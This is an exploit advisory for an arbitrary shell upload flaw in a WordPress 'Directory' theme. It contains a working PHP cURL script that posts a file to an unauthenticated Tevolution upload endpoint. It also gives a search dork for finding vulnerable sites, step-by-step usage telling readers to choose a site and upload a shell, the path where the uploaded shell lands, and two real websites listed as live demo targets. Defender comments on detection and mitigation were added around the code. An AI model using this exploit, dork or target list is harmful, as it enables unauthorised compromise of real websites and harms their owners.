WordPress Theme Directory versions 2.0.14 through 2.0.16 suffer from a remote shell upload vulnerability.
f9fbb19a9b58aeee4f54d7e668caceb3372e83a8daf2544b912e390992cf9481
######################
# Exploit Title : Wordpress Theme Directory Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/themes/Directory/
# Vendor Homepage : https://templatic.com/
# version : 2.0.14 - 2.0.16 & maybe higher or lower
# Tested on: [ BackBox ]
# skype:xbadgirl21
# Date: 15/08/2016
# video Proof : https://youtu.be/eVjW6rnaoSY
######################
# [+] USAGE :
######################
# 1.- Download or Copy the Exploit C0des
# 2.- Use Dork and Choose One Of the Website
# 3.- Edit The Script
# 4.- Upload Your File : shell.php.jpg or shell.php.txt
######################
# [+] Exploit:
######################
<?php
// Proof-of-concept for the advisory above: one unauthenticated multipart POST
// to single-upload.php shipped under the Tevolution plugin directory. Nothing in
// this script supplies a cookie, nonce or credentials, so the endpoint is being
// reached without any WordPress authentication - that absence of an auth/nonce
// check is the defect being demonstrated, and the thing a fix must add.
//
// Defender notes:
//  - Detection: alert on POST requests to .../tmplconnector/monetize/templatic-custom_fields/single-upload.php,
//    especially from sessions with no WordPress login cookie, and on any new file
//    appearing under wp-content/themes/Directory/images/tmp/ (the "Dev!l Path"
//    the advisory gives as the stored location).
//  - Mitigation: restrict or remove the endpoint, require a capability + nonce
//    check server-side, and deny execution of files under the tmp directory.
//
// Name of the local file that will be sent. The mixed-case double extension
// (".PhP.Txt") is the indicator to look for in upload logs: a ".php" segment
// appearing before the final extension. Only the filename matters to the PoC;
// its contents are whatever the operator placed in that local file.
$uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean
you are the Founder or Owner of this ^_^
// Target URL. 127.0.0.1 is a placeholder host (compare the <wp-host>/<wp-path>
// form used in the "Dev!l Path" section below); the interesting part for a
// site owner is the path, which tells you which file to check for on your own
// installs. Note the literal spans three lines as written.
$ch = curl_init("
http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
");
// Plain HTTP POST; the body is a multipart form with a single field named
// "file". The "@<path>" prefix is the legacy PHP-cURL file-upload syntax,
// which newer PHP releases no longer honour by default.
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
// Capture the server's response body instead of echoing it directly.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// Whatever single-upload.php returned is printed verbatim; the return value
// of curl_exec() (false on transport failure) is not checked.
print "$postResult";
?>
######################
# [+] Dev!l Path :
######################
#
http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt
######################
# [+] Live Demo :
######################
# http://guiagronicaragua.com/wp-content/themes/Directory/
# http://ilovehermanus.co.za/rv//wp-content/themes/Directory/
######################
# Discovered by : xBADGIRL21 - Unkn0wN
# Greetz : All Mauritanien Hackers - NoWhere
#######################
### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't
Want me to Write His Name
# so I Just Write the Exploit C0des ...........
#######################